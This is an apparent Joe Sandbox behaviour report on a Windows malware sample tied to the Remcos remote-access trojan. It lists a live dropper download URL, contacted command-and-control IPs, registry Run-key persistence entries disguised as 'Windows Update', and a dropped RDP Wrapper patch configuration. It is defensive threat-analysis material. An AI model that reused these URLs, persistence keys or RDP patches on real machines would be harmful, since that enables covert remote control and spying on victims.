                    https://hotmarzz.eu/goods/Droppertodownloa.exe | 0% | Avira URL Cloud | safe |
                    http://hotmarzz.eu/goods/Droppertodownloa.exem | 0% | Avira URL Cloud | safe |
                    http://hotmarzz.eu/goods/Droppertodownloa.exeOZ | 0% | Avira URL Cloud | safe |
                    https://support.google. | 0% | Avira URL Cloud | safe |
                    http://stascorp.comDVarFileInfo$ | 0% | Avira URL Cloud | safe |
                    http://hotmarzz.eu/goods/Droppertodownloa.exeW | 0% | Avira URL Cloud | safe |
                    https://hotmarzz.eu/goods/Droppertodownloa.exej | 0% | Avira URL Cloud | safe |
                    http://hotmarzz.eu/goods/Droppertodownloa.exe | 0% | Avira URL Cloud | safe |

                    Domains and IPs

                    Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    whatismyipaddress.com | 104.16.154.36 | true | false | | high
                    hotmarzz.eu | 195.110.124.154 | true | false | | high
                    smtp.privateemail.com | 66.29.159.53 | true | false | | high
                    216.47.6.0.in-addr.arpa | unknown | unknown | false | | high

                            Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    https://hotmarzz.eu/goods/Droppertodownloa.exe | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                    http://whatismyipaddress.com/ | false | | high
                    http://hotmarzz.eu/goods/Droppertodownloa.exe | false | Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094 | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmp | false | | high
                    https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k | remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    https://support.google.com/chrome/answer/6258784 | bin.exe, 00000003.00000002.944699333.00000000046E0000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.944739806.00000000046FD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845361008.00000000046FD000.00000004.00000001.sdmp | false | | high
                    https://www.google.com/?gws_rd=ssl | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    https://www.google.com/search | remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    http://hotmarzz.eu/goods/Droppertodownloa.exem | bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    https://www.google.com/chrome/static/images/favicons/favicon-16x16.png | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmp | false | | high
                    https://support.google.com/chrome/?p=plugin_flash | bin.exe, 00000003.00000002.944699333.00000000046E0000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.944739806.00000000046FD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845361008.00000000046FD000.00000004.00000001.sdmp | false | | high
                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1 | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    http://hotmarzz.eu/goods/Droppertodownloa.exeOZ | bin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                    http://www.nirsoft.net | remcos.exe, 0000001F.00000002.756308956.0000000000193000.00000004.00000001.sdmp | false | | high
                    https://support.google. | remcos.exe, 0000001F.00000002.756957465.0000000002229000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                    http://nsis.sf.net/NSIS_ErrorError | xxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmp | false | | high
                    https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/? | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    https://support.google.com/chrome/?p=plugin_java | remcos.exe, 0000001F.00000003.752021743.000000000222A000.00000004.00000001.sdmp | false | | high
                    https://www.google.com/favicon.ico | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    http://www.msn.com/de-ch/?ocid=iehp | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                    https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr | remcos.exe, 0000001F.00000003.749076522.000000000222E000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749491451.000000000222E000.00000004.00000001.sdmp | false | | high
                    https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go | remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp | false | | high
                                                                    http://stascorp.comDVarFileInfo$bin.exe, 00000003.00000003.834239549.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710177902.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706849187.0000000000D94000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833594602.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706749512.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707065597.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706915581.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837896441.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706804145.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840339214.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840815715.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833909279.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845234590.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.720653514.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932808488.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709580311.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837181130.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706772725.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833790621.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.834673194.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707076421.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706791322.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706882027.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833519937.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 
00000003.00000003.834003178.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.720698264.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706821542.0000000000DC0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845559560.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710039428.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709560738.0000000000D85000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    low
                                                                    http://nsis.sf.net/NSIS_ErrorxxTzyGLZx5.exe, xxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmpfalse
                                                                      high
                                                                      http://service.real.com/realplayer/security/02062012_player/en/remcos.exe, 0000001F.00000003.752013552.0000000002255000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.752875827.0000000002255000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsremcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.google.com/intl/en_uk/chrome/remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://www.msn.com/?ocid=iehpremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://consent.google.com/set?pc=s&uxe=4421591remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://hotmarzz.eu/goods/Droppertodownloa.exeWbin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.nirsoft.net/remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpfalse
                                                                                        high
                                                                                        https://github.com/syohex/java-simple-mine-sweeperC:xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000003.680946266.0000000000805000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000003.682059201.00000000007CD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, bin.exe, 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, bin.exe, 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, bin.exe, 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, bin.exe, 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, bin.exe, 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://hotmarzz.eu/goods/Droppertodownloa.exejremcos.exe, 0000000D.00000003.753230553.00000000006E9000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://support.google.com/premcos.exe, 0000001F.00000002.756957465.0000000002229000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&remcos.exe, 0000001F.00000003.749076522.000000000222E000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749491451.000000000222E000.00000004.00000001.sdmpfalse
                                                                                              high

                                                                                              Contacted IPs


                                                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.16.154.36 | whatismyipaddress.com | United States | 13335 | CLOUDFLARENETUS | false
185.157.161.174 | unknown | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | true
195.110.124.154 | hotmarzz.eu | Italy | 39729 | REGISTER-ASIT | false
66.29.159.53 | smtp.privateemail.com | United States | 19538 | ADVANTAGECOMUS | false
81.88.52.165 | unknown | Italy | 39729 | REGISTER-ASIT | false

                                                                                              Private

                                                                                              IP
                                                                                              192.168.2.1
                                                                                              127.0.0.1

                                                                                              General Information

                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                              Analysis ID:535501
                                                                                              Start date:07.12.2021
                                                                                              Start time:13:37:38
                                                                                              Joe Sandbox Product:CloudBasic
                                                                                              Overall analysis duration:0h 16m 8s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Sample file name:xxTzyGLZx5.exe
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                              Number of analysed new started processes analysed:47
                                                                                              Number of new started drivers analysed:3
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • HDC enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Detection:MAL
                                                                                              Classification:mal100.phis.troj.spyw.expl.evad.winEXE@62/52@12/7
                                                                                              EGA Information:Failed
                                                                                              HDC Information:
                                                                                              • Successful, ratio: 32.1% (good quality ratio 28.7%)
                                                                                              • Quality average: 72.7%
                                                                                              • Quality standard deviation: 33.2%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 53%
                                                                                              • Number of executed functions: 41
                                                                                              • Number of non-executed functions: 313
                                                                                              Cookbook Comments:
                                                                                              • Adjust boot time
                                                                                              • Enable AMSI
                                                                                              • Found application associated with file extension: .exe
                                                                                              Warnings:
                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 20.50.102.62, 204.79.197.222, 20.82.209.183, 52.182.143.212, 20.82.210.154, 20.54.110.249, 40.91.112.76
                                                                                              • Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, a-0019.a-msedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, 1.perf.msedge.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                              • Not all processes were analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

Time | Type | Description
13:38:46 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run logsmustcome "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
13:38:51 | API Interceptor | 879x Sleep call for process: cmd.exe modified
13:38:52 | API Interceptor | 40x Sleep call for process: powershell.exe modified
13:38:54 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Images C:\Users\user\AppData\Local\Temp\bin.exe
13:39:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run logsmustcome "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
13:39:35 | API Interceptor | 109x Sleep call for process: 21.exe modified
13:39:46 | API Interceptor | 308x Sleep call for process: 4.exe modified
13:39:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run itswell C:\Users\user\AppData\Roaming\itswell\itswell.exe
13:40:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run itswell C:\Users\user\AppData\Roaming\itswell\itswell.exe
13:40:14 | API Interceptor | 6x Sleep call for process: Windows Update.exe modified
13:40:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
13:40:24 | API Interceptor | 1x Sleep call for process: dw20.exe modified
13:40:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              No context

                                                                                              Domains

                                                                                              No context

                                                                                              ASN

                                                                                              No context

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Program Files\Microsoft DN1\rdpwrap.ini
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):222441
                                                                                              Entropy (8bit):5.28370530508163
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uEUfZFsTR0poD+X8f/qG65wgP100JJRWDCUlnKxbBHq1I517t/0A5ff4n+mmyIfd:uyIfgteoLwoIvxZ3779Zsoug
                                                                                              MD5:C5CA0F44F8913EB6055EBA91DACE5B48
                                                                                              SHA1:1318135EF55431DAC0654DE3989446703E7BE252
                                                                                              SHA-256:FB54DC1E345193DBE8AAADC8DC4CD68C6321C7701F5F732D6EEA3605E1B11B7B
                                                                                              SHA-512:0159E4C43D1780F64E7EF748F4E5C670BF7773D7E26B0DE35B9F4841421362CFF68192C54F4077F14C7E4BCD6AC416EF1A2855A761C8E974691ACA9F0B786790
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2021-01-16..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                                                                                              C:\Program Files\Microsoft DN1\sqlmap.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):116736
                                                                                              Entropy (8bit):5.884975745255681
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                                              MD5:461ADE40B800AE80A40985594E1AC236
                                                                                              SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                                              SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                                              SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 25%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 46%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Microsoft Vision\07-12-2021_13.38.52
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):110
                                                                                              Entropy (8bit):3.1311446292929235
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:blXlulovDluLAnyWdl+SliplWyWdl+SliplWyWdl+Slin:zuWpyWn+SkhWn+SkhWn+Skn
                                                                                              MD5:663942D41C4A0AFFA2367DE4CD855CDB
                                                                                              SHA1:D5D1149BAA07EA2FFD482979564E1C964C9DE03E
                                                                                              SHA-256:24CF2962CA5F0E9A4948227A0E0A9B6427382527B26FEA54BF9FAD3DC154F6B8
                                                                                              SHA-512:2E2822A50C4802726C20CC20E1AFEBA212CD1AAD4167259E23428E72F45205F61DA10FACE872CE00BA11D7D34CBC4C23FB1A2FCACCB9DE3B42A2913D704B7F2A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ..{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.e.f.t. .W.i.n.d.o.w.s.L.e.f.t. .W.i.n.d.o.w.s.L.e.f.t. .W.i.n.d.o.w.s.
                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\5.exe.log
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
